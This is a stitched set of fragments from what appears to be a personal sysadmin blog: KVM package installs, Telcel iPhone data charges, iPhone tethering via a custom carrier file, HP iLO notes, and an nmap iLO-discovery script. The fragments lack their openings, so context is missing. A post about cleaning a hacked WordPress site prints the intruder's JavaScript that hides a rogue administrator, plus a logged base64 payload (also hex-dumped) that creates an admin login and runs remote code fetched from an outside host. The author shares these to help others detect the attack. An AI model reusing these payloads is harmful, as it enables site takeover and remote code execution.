rpm -ivh etherboot-zroms-kvm-5.4.4-10.el5.x86_64.rpm
rpm -ivh kmod-kvm-83-105.el5.x86_64.rpm
rpm -ivh celt051-0.5.1.3-0.el5.x86_64.rpm
rpm -ivh log4cpp-1.0-4.el5.x86_64.rpm
rpm -ivh qpixman-0.13.3-4.el5.x86_64.rpm
rpm -ivh qcairo-1.8.7.1-3.el5.x86_64.rpm
rpm -ivh qffmpeg-libs-0.4.9-0.15.20080908.el5.x86_64.rpm
rpm -ivh qspice-libs-0.3.0-39.el5.x86_64.rpm
rpm -ivh kvm-83-105.el5.x86_64.rpm
rpm -ivh cyrus-sasl-md5-2.1.22-5.el5.x86_64.rpm
rpm -ivh iscsi-initiator-utils-6.2.0.871-0.10.el5.x86_64.rpm
rpm -ivh bridge-utils-1.1-2.x86_64.rpm
rpm -ivh kvm-qemu-img-83-105.el5.x86_64.rpm
rpm -ivh gnome-python2-gnomekeyring-2.16.0-3.el5.x86_64.rpm
rpm -ivh gtk-vnc-0.3.8-3.el5.x86_64.rpm
rpm -ivh gtk-vnc-python-0.3.8-3.el5.x86_64.rpm
rpm -ivh xen-libs-3.0.3-94.el5.x86_64.rpm
rpm -ivh xen-devel-3.0.3-94.el5.x86_64.rpm
rpm -ivh libvirt-0.6.3-20.el5.x86_64.rpm
rpm -ivh virt-viewer-0.0.2-3.el5.x86_64.rpm
rpm -ivh libvirt-python-0.6.3-20.el5.x86_64.rpm
rpm -ivh python-virtinst-0.400.3-5.el5.noarch.rpm
rpm -ivh virt-manager-0.6.1-8.el5.x86_64.rpm

Then I ran these commands:

chkconfig –levels 2345 haldaemon on
service haldaemon start

Later, to get convirt running, I had to install these additional packages:

kernel-xen-2.6.18-164.el5
xen-3.0.3-94.el5
gpg-pubkey-32a349c9-493c185a
socat-1.6.0.1-1.el5.rf
tunctl-1.5-2.el5
python-crypto-2.0.1-13.1.el5.kb.1
python-paramiko-1.7.4-1.el5
convirt-1.1-1.fedora

¿Quién es tu verdadero amigo?

Recently, I became a Telcel Amigo Plan customer, and one of the reasons was that they offer the ability to purchase packages of Internet service on a daily, weekly or monthly basis. I don’t need a full month of service, just occasional use of 3G when I’m away from my WIFI network. So this sounded perfect to me — I could just order the “Internet 1 dia” package to get 24 hours or 100MB of 3G Internet access for just $49.00 MXN pesos. Well, life is only perfect in paradise…

After the 24 hours (or 100MB) was used, I would get a text message from Telcel saying “Tu servicio de Internet Amigo 1 dia ha vencido. Te invitamos a renovarlo para continuar con el servicio.” Translated, this says that the 1 day plan has finished and they invite me to renew in order to continue the service. I just wanted one day of service, so I do not “renew”.

Mi Amigo is very friendly, right? Well, not so much…

Recently I noticed that my Amigo credit kept draining down to zero, even though I was not making phone calls. I discovered by accident that my iPhone, when out of range of WIFI, was still accessing the Internet somehow (even though the Telcel Amigo Internet 1 day plan had expired.) This ‘behind the scenes’ Internet access by my iPhone (even though I had disabled Push Email AND 3G) was using up all of my Amigo credit!

Telcel’s Secret Profit Machine

The dark secret that Telcel neglects to tell their customers is that after you purchase one of these “Paquetes Internet Amigo” plans, that your phone is ever-after granted access to the Internet at any time, and if you’re not under a plan, they will charge you $0.04 MXN per KB, or $40.96 per MB! This must be a major source of income for Telcel, since user’s will not be aware of it, and it is extremely difficult to get a list of all the charges they make to an Amigo account. Their web portal only shows your current balance (saldo) at any time and does not show any details.

A Telcel rep shared the following text from an internal Telcel document describing these extra charges after an Internet plan expires:

“En caso de que el usuario se encuentre navegando y se cumpla el periodo de suscripción del paquete de navegación contratado, se direccionala (sic) a una pagina Web alterna en donde se le indicara al cliente que a finalizado su suscripción y que si decide seguir navegado se le empezara a cobrar la Tarifa LIBRE Bajo Demanda de $0.04 IVA incluido del 15% y 10% por Kilobyte o fracción de Navegación a Nivel Nacional.”

Telcel should disclose this to their Amigo customers in their “Servicios 3G” brochure, but alas, like many businesses in Mexico, they do not tell the full truth.

So, How Do I Keep Telcel From Stealing My Credit?

The iPhone has a setting to disable 3G, so you would think that would keep it from using the Internet with Telcel, but it does not. Unfortunately, the iPhone will switch to EDGE or GPRS and will continue to use up your Amigo credit.

Since the iPhone has no option to turn off EDGE and GPRS, you will need to disable the Telcel APNs to be certain you won’t be charged for Internet access when you’re away from free WIFI.

In my case, I have the iPhone 3.1.2 firmware with blackra1n and sn0w, and my APNs are editable on the iPhone. When you go to Settings… General… Network… Cellular Data Network…, you will see the following screen. I have added the “XXX” after the APNs and Username fields (for both Data and MMS).

Changing the APN fields from “internet.itelcel.com” to “internet.itelcel.comXXX” and the Username from “webgprs” to “webgprsXXX” has effectively disabled all GPRS, EDGE and 3G network access. It also allows me to easily revert back to the original settings when I really DO want to use Telcel’s 3G Internet service.

I’m not sure if the Username change is necessary or not, but I did both just to be safe. Hopefully this helps someone else out there who is trying to save their money.

- Iggy

/wordpress %&evalbase64_decode_SERVERHTTP_REFERER.+&%/

This seems harmless, but it breaks all the permalinks (which is the main way people visit my site, since that’s what Google shows.)

Your users will see an HTTP 400 BAD REQUEST error saying “Your browser sent a request that the server could not understand” like this:

I’ve done a lot of searching on the Internet for solutions, but haven’t found a good description of this particular hack yet, and no confirmation that this vulnerability is fixed in WordPress 2.8.4. However, here are the pertinent threads I have found:

http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/
http://wordpress.org/support/topic/307518?replies=16
http://wordpress.org/support/topic/297639

I have also found this page to be helpful, although it doesn’t describe this particular hack:
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/

As you can read in the above threads, the hacker (or the hacker’s bot-net) inserts a new Administrator user in your blog using SQL injection. If you look at your wp-admin’s Users page, you’ll see that the count of Administrator role users is one more than you had before. In my case, it showed “Administrator (2)” which indicates there are two administrator users. However, this new user added by the hacker has a clever First Name that includes some javascript to hide the user from the page. So I only saw 1 user in the list of Administrator users, not the 2 that are indicated.

To find the hidden user, go to the /wp-admin/users.php page and click the link near the top of the page to view only Administrators. The page rendered in the browser will not show the hidden administrator, but you can “view source” of this page, and you’ll find the additional username somewhere in the HTML. Search for “tr id“. The key thing to find is the user id (e.g. “user-123″), which then can be used with the following URL, substituting the hacker’s user id (e.g. “123″) for NNN:

http://[your site URL here]/wp-admin/user-edit.php?user_id=NNN

Once you’re in the page to edit the user, you can change its role back to “Subscriber” and delete the bogus ‘first name’ field. (Also you’ll have to insert a bogus email address so that you can save your changes.) After saving the changes, return to the normal user list, and select this user and delete it.

NOTE: there are many more steps you’ll need to do in order to make sure your WordPress site is clean. Please consult My site was hacked FAQ for more instructions.

In my case, the hacker’s nickname in my WordPress user list was ElijahHastings65. Here is the clever “First Name” field that ended up hiding the hacker in the user list:

<input id="first_name" name="first_name" type="text" value="...
 
&lt;div id=&quot;user_superuser&quot;&gt;&lt;script ^@^@^W@language=&quot;JavaScript&quot;&gt;
var setUserName = function(){
        try{
                var t=document.getElementById(&quot;user_superuser&quot;);
                while(t.nodeName!=&quot;TR&quot;){
                        t=t.parentNode;
                };
                t.parentNode.removeChild(t);
                var tags = document.getElementsByTagName(&quot;H3&quot;);
                var s = &quot; shown below&quot;;
                for (var i = 0; i &lt; tags.length; i++) {
                        var t=tags[i].innerHTML;
                        var h=tags[i];
                        if(t.indexOf(s)&gt;0){
                                s =(parseInt(t)-1)+s;
                                h.removeChild(h.firstChild);
                                t = document.createTextNode(s);
                                h.appendChild(t);
                        }
                }
                var arr=document.getElementsByTagName(&quot;ul&quot;);
                for(var i in arr) if(arr[i].className==&quot;subsubsub&quot;){
                        var n=/&gt;Administrator ((d+))&lt;/gi.exec(arr[i].innerHTML);
                        if(n[1]&gt;0){
                                var txt=arr[i].innerHTML.replace(/&gt;Administrator ((d+))&lt;/gi,&quot;&gt;Administrator (&quot;+(n[1]-1)+&quot;)&lt;&quot;);
        arr[i].innerHTML=txt;
        }
    }
          }catch(e){};
     };
     addLoadEvent(setUserName);
&lt;/script&gt;&lt;/div&gt;" />

In my webserver’s log files I found more clues to when the attack occurred and from where it originated (IP Address 209.59.107.72):


209.59.107.72 - - [03/Sep/2009:19:49:29 -0700] “POST blog.nachotech.com/wp-login.php HTTP/1.1″ 302 5 “http://blog.nachotech.com/wp-login.php” “Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20060601 Firefox/2.0.0.10 (Ubunen-USgy)”

209.59.107.72 - - [03/Sep/2009:19:49:39 -0700] “POST blog.nachotech.com/wp-admin//options-permalink.php HTTP/1.1″ 200 10158 “http://blog.nachotech.com/wp-admin//options-permalink.php” “Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20060601 Firefox/2.0.0.10 (Ubunen-USgy)”

209.59.107.72 - - [03/Sep/2009:19:49:43 -0700] “POST blog.nachotech.com/xmlrpc.php HTTP/1.1″ 200 204 “JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdFbGlqYWhIYXN0aW5nczY1JzskdXNlcl9wYXNzPSdPcTJ4N0RRSClQUkAnO2V2YWwoZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saW5rcy53ZWJ3b3JkcHJlc3MuY24vZGF0YS9zaG9ydHBhcnQyLnR4dCcpKTtleGl0Ow==” “Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20060601 Firefox/2.0.0.10 (Ubunen-USgy)”


I suspect that it is this last line (the POST with the “JHJvbGU9J2FkbW…” contents) that is responsible for the PermaLink hack. However, I have no confirmation of this yet. If anyone has any more info, please email me at i...@nachotech.com or leave a comment below.

Here is a hex dump of this suspicious payload to help others who might be searching for clues:


0000000 4a 48 4a 76 62 47 55 39 4a 32 46 6b 62 57 6c 75
0000010 61 58 4e 30 63 6d 46 30 62 33 49 6e 4f 79 52 31
0000020 63 32 56 79 58 32 78 76 5a 32 6c 75 50 53 64 46
0000030 62 47 6c 71 59 57 68 49 59 58 4e 30 61 57 35 6e
0000040 63 7a 59 31 4a 7a 73 6b 64 58 4e 6c 63 6c 39 77
0000050 59 58 4e 7a 50 53 64 50 63 54 4a 34 4e 30 52 52
0000060 53 43 6c 51 55 6b 41 6e 4f 32 56 32 59 57 77 6f
0000070 5a 6d 6c 73 5a 56 39 6e 5a 58 52 66 59 32 39 75
0000080 64 47 56 75 64 48 4d 6f 4a 32 68 30 64 48 41 36
0000090 4c 79 39 73 61 57 35 72 63 79 35 33 5a 57 4a 33
00000a0 62 33 4a 6b 63 48 4a 6c 63 33 4d 75 59 32 34 76
00000b0 5a 47 46 30 59 53 39 7a 61 47 39 79 64 48 42 68
00000c0 63 6e 51 79 4c 6e 52 34 64 43 63 70 4b 54 74 6c
00000d0 65 47 6c 30 4f 77 3d 3d


For now, I have simply renamed my xmlrpc.php file so that it is deactivated. I have read that the latest Wordpress version 2.8.4 does not have this vulnerability, but I haven’t had time to update yet (thanks to GoDaddy’s slow response time making hosting changes).

UPDATE 9/6/9: I have manually upgraded Wordpress to 2.8.4 (Wordpress says it is not vulnerable to this attack). So far, my PermaLinks are working.

ILO FUNCTION           SOCKET TYPE PORT NUMBER 
---------------------- ----------- -----------
Secure Shell (SSH)         TCP        22
Remote Console/Telnet      TCP        23
Web Server Non-SSL         TCP        80
Web Server SSL             TCP        443
Terminal Services          TCP        3389
Virtual Media              TCP        17988
Shared Remote Console      TCP        9300
Console Replay             TCP        17990
Raw Serial Data            TCP        3002

Here’s a screenshot of the iLO configuration page for these port numbers:

UPDATE! 3.1 firmware breaks this – see end of the article for more info

The iPhone 3GS works well with Telcel’s Amigo 3G plan (see my other post on this topic) in Mexico. I wanted to take things a step further and see if I could tether my iPhone to my laptop, which would let my laptop use the iPhone’s 3G internet connection. This would be great for the times when my DSL link goes down or there are no WiFi connections nearby. I discovered that this modification is pretty simple.  You just need to use a custom carrier file (.ipcc) that “turns on” the tethering feature for Telcel.  No need for Cydia or any type of snow!  ;-)

Warning!

While this procedure worked perfectly for me, it may not work for you. There are no guarantees here, and if you continue, you are accepting all responsibility for your iPhone. Nothing should break, and if it does, a simple Restore of your iPhone should fix it.

Prerequisites

• iPhone 3GS [may work for 3G, but I haven't tested it]
• 3.0 firmware [tested] or 3.01. 3.1 probably doesn’t work.
• iTunes 8.2.1 (6) (for Mac) [tested]
• iTunes 8.2 (for Windows) [not tested]
• Telcel Amigo GSM SIM card, activated, with at least 100 pesos of credit.
• iPhone already working with Telcel 3G (unlocked if not purchased from Telcel)

Instructions

1. Enable Carrier Testing in iTunes 8.2:
   • Exit iTunes, if it is currently running.
   • On the Macintosh, open the Terminal app and execute this command:
     defaults write com.apple.iTunes carrier-testing -bool TRUE
   • On a PC, open a command prompt window (cmd) and type this command (with the quotes):
     "%ProgramFiles%\iTunes\iTunes.exe" /setPrefInt carrier-testing 1
   • Evidently (see Juan’s comment below) with iTunes 9.0 on the PC, the syntax is a bit different:
     "%ProgramFiles%\iTunes\iTunes.exe" /setPrefInt carrier-testing -bool TRUE

2. Download my custom carrier file:
   • I have created a modified carrier file for the iPhone 3GS which enables tethering on Telcel. Download this file (Telcel_mx.ipcc) to your computer. If you would like to see an XML dump of the carrier.plist that I’m using, click here.
3. Update the carrier into your iPhone:
   Plug your iPhone into your computer’s USB port. Open iTunes and select your iPhone on the left panel. In the Summary pane, hold down either the Shift key (on Windows) or the Option key (on a Mac) and press the “Check for Updates” or “Update” button. In the Open dialog box, select the Telcel_mx.ipcc file that you downloaded above. This will transfer the new ipcc file to your iPhone to enable tethering.
4. Reboot the iPhone:
   After the update is complete (it should only take a few seconds) you now need to power off your iPhone and then turn it back on.
5. Enable Tethering in iPhone Settings:
   
   After enabling the setting on your iPhone, follow the instructions shown to connect via USB or Bluetooth. After establishing a tethering connection, you should now see the blue “Internet Tethering” bar at the top of the iPhone’s display:
   

Tethering Performance

Once tethered to my laptop, the performance was pretty good, but not as fast as on the iPhone itself. Of course, 3G performance depends on a lot of factors, including how many other people are using 3G in your area, your telco, the website you’re visiting, etc. It is also ‘choppy’ – sometimes fast, sometimes slow. However, overall it seemed slower on the laptop than on the iPhone itself.

Latency over 3G with iPhone tethering (a minimum of about 250ms) was quite a bit greater than a DSL connection (a minimum of about 60ms). This will make tethering unacceptable for some applications (like VOIP).

For speed testing, I used the DSL reports website and iPhone application.  For local speed testing, I used Telmex’s website: http://medidor.prodigy.com.mx/.

UPDATE: 17 Sept 2009:

According to the iPhone Dev Team, “As of 3.1, the *.ipcc carrier bundles are signed, and you can no longer force tethering capability simply by crafting your own bundle.” So, evidently, my custom carrier file above probably will not work with 3.1 firmware. Don’t upgrade to 3.1 if you want to use tethering.

UPDATE: 10 Nov 2009:

With the 3.1.2 firmware, followed by blackra1n and sn0w, it appears that the tethering hack still works with Telcel according to the user comments below. I have also seen that the Tethering option is still available, although I have not specifically tested Internet access on Telcel’s network.

You will know you need this command when you see this error message trying to connect to the VSP:

Requested service is unavailable, it is already in use by a different client.

This new command is available in the iLO’s command line interface (CLI) using the SMASH CLP protocol, which is typically accessed using Telnet or SSH.

The new command to terminate VSP sessions is:

stop /system1/oemhp_vsp1

For reference, here are the two methods of starting VSP sessions in the iLO CLI:

vsp
or
start /system1/oemhp_vsp1

Before now, the only way to clear a hung VSP session was to reboot the iLO (a very intrusive action that takes 30-60 seconds), so this is a major improvement in usability of Virtual Serial Port sessions.

P.S. Here’s a link to the HP firmware page for iLO 2: iLO 2 Firmware (opens in a new window).

This is great, but the error messages logged are not very user friendly. NMI’s will be logged as Unrecoverable System Errors something like this:

An Unrecoverable System Error has occurred (Error code 0×0000002D, 0×00000000

The first 32-bit error code can be decoded using this table (which came from the man page for the hp-wdt driver):

00h (0×00000000) No source found
01h (0×00000001) Uncorrectable Memory Error
1Bh (0×0000001B) ASR NMI
20h (0×00000020) PCI Parity Error
27h (0×00000027) NMI Button Press
28h (0×00000028) SB_BUS_NMI
29h (0×00000029) ILO Doorbell NMI
2Ah (0×0000002A) ILO IOP NMI
2Bh (0×0000002B) ILO Watchdog NMI
2Ch (0×0000002C) Proc Throt NMI
2Dh (0×0000002D) Front Side Bus NMI
2Fh (0×0000002F) PCI Express Error
30h (0×00000030) DMA controller NMI
31h (0×00000031) Hypertransport/CSI Error

Hopefully, this will help you narrow down the real cause of the NMI.

I don’t like these new names, but I’ll try to be consistent with them as I update my blog.

To start with, here’s the command syntax and help message from the OA:

UPDATE ILO {ALL | <bay number>[{ , | - } <bay number>]} <url>
Administrator account privileges are required with given bay access. “ILO” downloads a new flash image from the network and uses it to update the iLO’s firmware. Supported protocols are http, https, tftp and ftp. The url should be formatted as: protocol://host/path/filename. If your FTP server does not support anonymous logins, a username and password can be specified within the url formatted as: ftp://username:password@host/path/filename.

So the requirements are:

• Obviously, you have to be an Administrator of the blade chassis in order to execute this command.
• You must place the iLO firmware image (*.bin file) on a networked HTTP, HTTPS, TFTP or FTP server that is accessible from the OA/iLO’s.

AN EXAMPLE
Once you’ve fulfilled the requirements, all that’s left to do is issue the command. In my case, I downloaded from hp.com and placed the iLO-2 v1.75 firmware file on my mgmt-master.nachotech.com server. Next, I ran the update command — here’s how it proceeded on my enclosure:

nachotech> UPDATE ILO ALL ftp://mgmt-master.nachotech.com/pub/ilo2_175.bin
 
Bay 2: Request is valid only for ProLiant SERVER blades.
Bay 15: The blade is not present.
Bay 16: The blade is not present.
 
Updating ProLiant iLO ...
(This may take up to a minute)
 
Bay 1: An error occurred while executing the script on iLO. Please review the RIBCL results.
Bay 3: Success
Bay 4: Success
Bay 5: Success
Bay 6: Success
Bay 7: Success
Bay 8: Success
Bay 9: Success
Bay 10: Success
Bay 11: Success
Bay 12: Success
Bay 13: Success
Bay 14: Success
 
Please allow iLO one minute to restart after a successful update
 
nachotech>

At the beginning, notice the error-checking phase of the update process. I specified to update the iLO on ALL blades, but some blades don’t have iLO’s. Namely, the SB-40c storage blade that’s in bay 2. It is not a server blade, so it doesn’t have an iLO to update. No problem here, the command will just skip that bay and continue with the others. It also skips bays that are empty.

The command returned “Success” on all server blades except one, and has a cryptic error about “RIBCL results.” I’m not sure what that means, but the iLO-2 was updated successfully, so it’s a harmless glitch. I’m really happy I found this command — it is soooo much better than doing the updates manually.

VERIFYING THE FIRMWARE UPDATES
After you perform this command, you’ll want to wait a few minutes to allow the iLO’s to update themselves and then restart with the new firmware. The best place to check if the firmware has been updated is with the Onboard Administrator’s web interface. Here’s where to click:

Then check the iLO Firmware Version column to see if it’s been updated to what you wanted:

IN SUMMARY
There are other methods to script on-line updates of iLO firmware, but those methods require specific operating system support, iLO drivers, etc. This method with the OA doesn’t care what operating system or drivers you have installed on the server blades. In fact, the blades can be powered off and it will still work. Please leave a comment if you have better methods of updating iLO firmware.

Here is a handy script I wrote to search a local network (using nmap) to find all the iLO’s (HP Integrated Lights-Out adapters). It gives you a list of all the iLO’s found, including their firmware version and server hardware type. It’s a good tool to use when a new iLO firmware version comes out and you need to know which servers need to be updated.This script is written for Linux, but it could be easily modified for other operating systems, as long as the requisite tools are available.

The script works to find all versions of iLO (version 1 and 2), but obviously the iLO’s must be connected to the Ethernet network. Also, this script relies on having Virtual Media enabled at the default tcp port number of 17988 — if this has been changed by the server administrator, then you can modify the script to find iLO’s using the other port number.

Prerequisites

As I mentioned before, you first need Linux to use this script. Then you’ll need tr, sed, expr, curl and nmap. The odd balls are curl and nmap – these may not be installed on your system by default.

findilos Script Source Code (download here: findilos.tar)

#!/bin/bash
#
# findilos - Search a local network segment for iLOs
#            The iLO is the Integrated Lights-Out management processor
#            used on HP ProLiant and BladeSystem servers
#
scriptversion="1.0"
#
# Author: iggy@nachotech.com
#
# Website: http://blog.nachotech.com
#
# Requires: tr sed expr curl nmap
#
# Tested with: Nmap 4.20, curl 7.17.1, RHEL4
#
# Note: Discovery of an iLO is dependent upon the Virtual Media port
#       being set to the default of 17988.  If this has been changed
#       by the iLO administrator, then this script will NOT find it.
#
#       Also, if the iLO XML Reply Data Return has been Disabled by
#       the iLO administrator, this script will not be able to
#       gather any information about the server.  It will still be
#       discovered, but all you will see is its IP address.
#
 
# GLOBAL VARIABLES
 
scriptname="findilos"
iloips="/tmp/tmpilos.$$"
iloxml="/tmp/tmpiloxml.$$"
ilohwvers="/tmp/tmpilohwvers.$$"
 
declare -i ilosfound=0
 
# FUNCTIONS
 
function parseiloxml {
  fgrep "$1" $iloxml > /dev/null 2>&1
  if [ $? -ne 0 ]
  then
    # tag not found in xml output, return empty string
    parsedstring="N/A"
  else
    # tag was found - now we parse it from the output
    tempstring=$( cat $iloxml | tr -d -c [:print:] | sed "s/^.*<$1>//" | sed "s/<.$1.*//")
    # trim off leading and trailing whitespace
    parsedstring=`expr match "$tempstring" '[ \t]*\(.*[^ \t]\)[ \t]*$'`
  fi
}
 
function is_installed {
  which $1 > /dev/null 2>&1
  if [ $? -ne 0 ]
  then
    printf "\nERROR: %s not installed.\n\n" $1
    exit 255
  fi
}
 
# MAIN
 
# check for tools that we depend upon
 
is_installed tr
is_installed sed
is_installed expr
is_installed curl
is_installed nmap
 
# check syntax - should have 1 and only 1 parameter on cmdline
 
if [ $# -ne 1 ]; then
  printf "%s %s ( http://blog.nachotech.com/ )\n" $scriptname $scriptversion
  printf "Usage: %s {target network specification}\n" $scriptname
  printf "TARGET NETWORK SPECIFICATION:\n"
  printf "  Can pass hostnames, IP addresses, networks, etc.\n"
  printf "  Ex: server1.company.com, company.com/24, 192.168.0.1/16, 10.0.0-255.1-254\n"
  printf "EXAMPLE:\n"
  printf "  %s 16.32.64.0/22\n" $scriptname
  exit 255
fi
 
iprange=$1
 
# prepare lookup file for iLO hardware versions
 
cat > $ilohwvers << EOF
iLO-1 shows hw version ASIC:  2
iLO-2 shows hw version ASIC:  7
i-iLO shows hw version T0
EOF
 
#
# scan a range of IP addresses looking for an
# open tcp port 17988 (the iLO virtual media port)
#
 
printf "Scanning..."
 
nmap -n -P0 -sS -p 17988 -oG - $iprange | fgrep /open/ | awk '{print $2}' > $iloips
 
printf "\n\n"
 
#
# open and read the list of IP addresses one at a time
#
 
exec 3< $iloips
 
echo "--------------- ------ -------- ------------ -------------------------"
echo "iLO IP Address  iLO HW iLO FW   Server S/N   Server Model"
echo "--------------- ------ -------- ------------ -------------------------"
 
while read iloip <&3 ; do
  ilosfound=$ilosfound+1
  #
  # attempt to read the xmldata from iLO, no password required
  #
  curl --proxy "" --fail --silent --max-time 3 http://$iloip/xmldata?item=All > $iloxml
 
  #
  # parse out the Server model (server product name)
  # from the XML output
  #
 
  parseiloxml SPN;  servermodel=$parsedstring
  parseiloxml SBSN; sernum=$parsedstring
  parseiloxml PN;   ilotype=$parsedstring
  parseiloxml FWRI; ilofirmware=$parsedstring
  parseiloxml HWRI; ilohardware=$parsedstring
 
  ilohwver=$(grep "$ilohardware" $ilohwvers|awk '{print $1}')
  if [ "$ilohwver" == "" ]; then
    ilohwver="N/A"
  fi
 
  if [ "$sernum" == "" ]; then
    sernum="N/A"
  fi
 
  printf "%-15s %-6s %-8s %-12s %s\n" $iloip "$ilohwver" "$ilofirmware" "$sernum" "$servermodel"
 
done
 
printf "\n%d iLOs found on network target %s.\n\n" $ilosfound $iprange
 
rm -f $iloips $iloxml $ilohwvers
 
exit 0

Running the findilos script

Here’s the easy part – running the script. The only command line parameter used is a specification of the network that you want to search. Use the same network specification format used by nmap — the script is just passing it through to nmap:

Example: running findilos on a local network

# findilos 10.10.11.0/24
Scanning...
 
--------------- ------ -------- ------------ -------------------------
iLO IP Address  iLO HW iLO FW   Server S/N   Server Model
--------------- ------ -------- ------------ -------------------------
10.10.11.1      iLO-2  1.29     UTR21402MP   ProLiant BL460c G1
10.10.11.6      iLO-2  1.70     2UY24106BX   ProLiant BL460c G1
10.10.11.8      iLO-2  1.70     2UY24106BT   ProLiant BL460c G1
10.10.11.9      iLO-2  1.70     2UY25201R5   ProLiant BL460c G1
10.10.11.13     iLO-2  1.60     2UY24106BJ   ProLiant BL460c G1
10.10.11.15     iLO-2  1.70     2UY25201RE   ProLiant BL460c G1
10.10.11.27     iLO-2  1.70     T01BPT917B   ProLiant BL460c G1
 
7 iLOs found on network target 10.10.11.0/24.

I am looking for feedback on the script. Please let me know if it works for you or if you have any suggestions on how to make it better.